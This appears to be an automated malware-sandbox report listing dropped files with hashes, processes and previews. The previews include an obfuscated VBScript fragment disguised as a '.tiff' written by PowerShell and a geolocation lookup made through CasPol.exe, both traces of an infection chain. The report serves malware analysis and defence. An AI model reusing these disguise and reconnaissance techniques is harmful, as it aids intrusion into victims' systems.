                                                                                                                                                                                                                              MD5:E40106BD416818F0E9EF8816C793E602
                                                                                                                                                                                                                              SHA1:8F7E8E1830489AB1DB6CDBBC294608A37FBE4B31
                                                                                                                                                                                                                              SHA-256:65EB872ED25545D340EF38CE3C5BF959F968754FCDEB2CD2267A583D83B1F092
                                                                                                                                                                                                                              SHA-512:B236FDEE99E5322B08FB659A95338A63289E9CDDC266E45EAE769444B42DB07BB4B891ECB9F30359EEC7CB0AFBA2FAE743A1A12749794035CBEB591BEB5E44E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732046019239404}]}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85
                                                                                                                                                                                                                              Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
                                                                                                                                                                                                                              MD5:265DB1C9337422F9AF69EF2B4E1C7205
                                                                                                                                                                                                                              SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
                                                                                                                                                                                                                              SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
                                                                                                                                                                                                                              SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f3900dc5-811d-4594-9dae-304eeb361f77.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090520956326506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keCLmZtstR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynJtGhOxqQoRTuiVIos
                                                                                                                                                                                                                              MD5:F25ADC1325EDB7883A8F2DE24372A781
                                                                                                                                                                                                                              SHA1:9E1666A98593919EB1D757A66F662176E46173B5
                                                                                                                                                                                                                              SHA-256:B2F4DA5AB8E316E646C16375B44B637BBE18DBBD9E858CF2CB59F3E89E24F0FA
                                                                                                                                                                                                                              SHA-512:FEF6A872E58C00574A6C13C838E69C64284BDF17D255BA1EF64FCDD5548E25054AFB062826D36C15AB4AF8CC3F744BA54C65AEFE979A6E89B3CAF06D513EEADE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2278
                                                                                                                                                                                                                              Entropy (8bit):3.839573074433602
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:uiTrlKxrgxExl9Il8ub+klazlqEgOmR9g9bZw49xbTbd1rc:mJYNblM1gOO9gbZPe
                                                                                                                                                                                                                              MD5:FAA952FF93BA372F6E657E0B942F0515
                                                                                                                                                                                                                              SHA1:F64257E3A42DFA54A0EE76728EF12F6ED5E31A02
                                                                                                                                                                                                                              SHA-256:1CF580CFCDD31D3E38A66857087B65C05CB3701303782DD428520CDEE2B9E546
                                                                                                                                                                                                                              SHA-512:707053363DDAC7DF63B57B2B49DEC6E2E5073D73C37BB2A70EC1BF7D2B05FFA612CFAB52EC0D60AB4F1ABAC4543F7CBF0BBFABCDA24C70CF2835B4DB16254F13
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.J.X.n.a.d.o.5.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4622
                                                                                                                                                                                                                              Entropy (8bit):4.00561747259816
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wY3AoC4hnuJvjWOqefZ6iJnaDIRau/lzWlVtIC3lhKLaEp:wHoC4hnuJ7W4Z6iJnLIutzehOaEp
                                                                                                                                                                                                                              MD5:9F2BEAFFADB8093FAE7A34C1417A0DA3
                                                                                                                                                                                                                              SHA1:4EA5EC43774C2404CDDD5DB20F4C4CA1DE14E32B
                                                                                                                                                                                                                              SHA-256:52A35B795EFBEC26322529E9BADFA68105AD1565806BE748855E4B241699B4BF
                                                                                                                                                                                                                              SHA-512:233BF63C1034B63A5DE71A46662017A868E768DA55D5EB145F18F8EA78952ECE64FE1AA15817CC01D36A242A5160FCC8343D82148812591542FA119029908014
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".O.E./.l.T.9.I.5.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2684
                                                                                                                                                                                                                              Entropy (8bit):3.896546712014601
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xkMuxl9Il8u2OVv0Ew3z6oFmL/a99RM0f3Utp76ftd/vc:aEYgOVv0P6ImL/c7M0ctpP
                                                                                                                                                                                                                              MD5:A83F095C7D6D4A68FD4610510D426287
                                                                                                                                                                                                                              SHA1:93CCFFF717C5F9F1B0075B95B3E32CF40A02F3DD
                                                                                                                                                                                                                              SHA-256:1B74FE921DCB13F8A55BBEDB1270B81B6238F8EA2148285CBDD08518B48A3A28
                                                                                                                                                                                                                              SHA-512:22A376F992BF0DAD9881EF75CECDFC584D2332F38CF25FA366ECA9A7ED3804340580DC5FB9EED98F98A70810B4E6C7A7C10AEDC04DC251BE587D463D5BBEBB47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".f.c.+.v.g.K.N.Y.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.F.T.q.D.u.S.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\createthebestthingswithgoodthingsbestforgreatthingsformeevengood[1].tiff

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (372), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):140880
                                                                                                                                                                                                                              Entropy (8bit):3.673474644726778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:sK4Og9oq843Inb8CU3OuunFFKCLAgt5pKQGwm:sOaGb8CUxuFs
                                                                                                                                                                                                                              MD5:C9B675B1514C024221535D4BDE6F6C69
                                                                                                                                                                                                                              SHA1:24594969BC105AEC0E15F109872193C030C0C102
                                                                                                                                                                                                                              SHA-256:E58BA960C159E99A12D4C50D3FFFE4A9EE2B50F08E702BC90D4E18B7AA9421FB
                                                                                                                                                                                                                              SHA-512:328E530EB7ABB045624D793FAF89CCC1A16E0C1A1C58E3A33D2CB4BD955742D511F3B07D183423A7643A57579CDD0591D968640D106FAD5D1C6A4B1AD4C494D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..........F.u.n.c.t.i.o.n. .a.t.r.o.c.e.m.e.n.t.e.(.B.y.V.a.l. .a.l.t.e.r.n.i.p.e.n.n.e.,. .B.y.V.a.l. .e.m.p.a.r.e.d.a.r.,. .B.y.V.a.l. .m.a.i.o.r.i.n.o.)..... . . . .D.i.m. .f.u.l.i.g.i.n.o.s.o..... . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .f.u.l.i.g.i.n.o.s.o. .>. .0..... . . . . . . . .a.l.t.e.r.n.i.p.e.n.n.e. .=. .L.e.f.t.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .-. .1.). .&. .m.a.i.o.r.i.n.o. .&. .M.i.d.(.a.l.t.e.r.n.i.p.e.n.n.e.,. .f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.e.m.p.a.r.e.d.a.r.).)..... . . . . . . . .f.u.l.i.g.i.n.o.s.o. .=. .I.n.S.t.r.(.f.u.l.i.g.i.n.o.s.o. .+. .L.e.n.(.m.a.i.o.r.i.n.o.).,. .a.l.t.e.r.n.i.p.e.n.n.e.,. .e.m.p.a.r.e.d.a.r.)..... . . . .L.o.o.p..... . . . ..... . . . .a.t.r.o.c.e.m.e.n.t.e. .=. .a.l.t.e.r.n.i.p.e.n.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):956
                                                                                                                                                                                                                              Entropy (8bit):5.0171731747546415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qpQYdRNuKyGX85MEBZvXhNlT3/7l1DYro:OlPN0GX85dDvhjTZuro
                                                                                                                                                                                                                              MD5:BA2D0529EAA52268CF1C64FE5AF70F9E
                                                                                                                                                                                                                              SHA1:F7CEAA9E2724924B5FEEA5CA8C2BA5C6AACD56B8
                                                                                                                                                                                                                              SHA-256:F7E9130B5094A918CDF1AA99F559D3BD0123EDADA38F1215BD601C17F0F332D8
                                                                                                                                                                                                                              SHA-512:6EE6ED6A077527DD29E3065FD2D341F7697DC658303F2B684B6F1F8D8653F80A406876DB5C974B55FF3C7CA152B6CC029CBE66CB01FC0B4776728B014FA2D0CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{. "geoplugin_request":"155.94.241.187",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5829
                                                                                                                                                                                                                              Entropy (8bit):4.901113710259376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                                              MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                                              SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                                              SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                                              SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:@...e...........................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\27ab2aae-606e-43d2-b972-e56a92e1a1b6.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):135771
                                                                                                                                                                                                                              Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                              MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                              SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                              SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                              SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\RESAD4B.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Nov 18 17:51:51 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1336
                                                                                                                                                                                                                              Entropy (8bit):3.9910059158389597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:HFm9Iy/LHWwKTF9mfwI+ycuZhNS1akSD6PNnqSSd:FCLVKTfmo1ulGa3iqSC
                                                                                                                                                                                                                              MD5:3CD95C657DABAB693D123C64C3CDDC56
                                                                                                                                                                                                                              SHA1:5EE22F2CA7D1E266FA58CDF67990CB6382366884
                                                                                                                                                                                                                              SHA-256:C279456736F47F20F85F4C06B734629030A1F704D61E5E0368CAA86A619F32EC
                                                                                                                                                                                                                              SHA-512:79855C3B83F0832EC3C4EEA8CEE52D5D5161BA6777E33A68876EDEE43A841F7221DFF8F425C17A7A8BB8BFB083CFCEAC37A723453D58EEB512409D91E0BD3322
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:L....~;g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP..................\0...n4_.U....[...........5.......C:\Users\user\AppData\Local\Temp\RESAD4B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\TmpUserData\BrowserMetrics\BrowserMetrics-673B62FC-67C.pma

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                              Entropy (8bit):0.04649138517252469
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:WujUp0jLYiVWK++BhFNy5XJjpRlakC2GXnSgIbU5h/ZNEYIUVg1RQcG7xSUn8y0d:WOUp0jjlRwH8bhxPgrwxD08T2RGOD
                                                                                                                                                                                                                              MD5:5607F702C05108A63FE755574E18C906
                                                                                                                                                                                                                              SHA1:9AABA97B5D84DD33268B2034E60A87DF8406F0DC
                                                                                                                                                                                                                              SHA-256:C2C843C85F63A403F3235B5F57827B897DA6C657BEE130945980C354330336B1
                                                                                                                                                                                                                              SHA-512:2961B09AEEF2F1936DE17458BC3CE81AA3A88F27AA704C2E8DD2D0347359926543A21C2FFC487CE1D36DAC78713FDF29D0F68A11C3CCE2777284DA98712D6666
                                                                                                                                                                                                                              Malicious:false
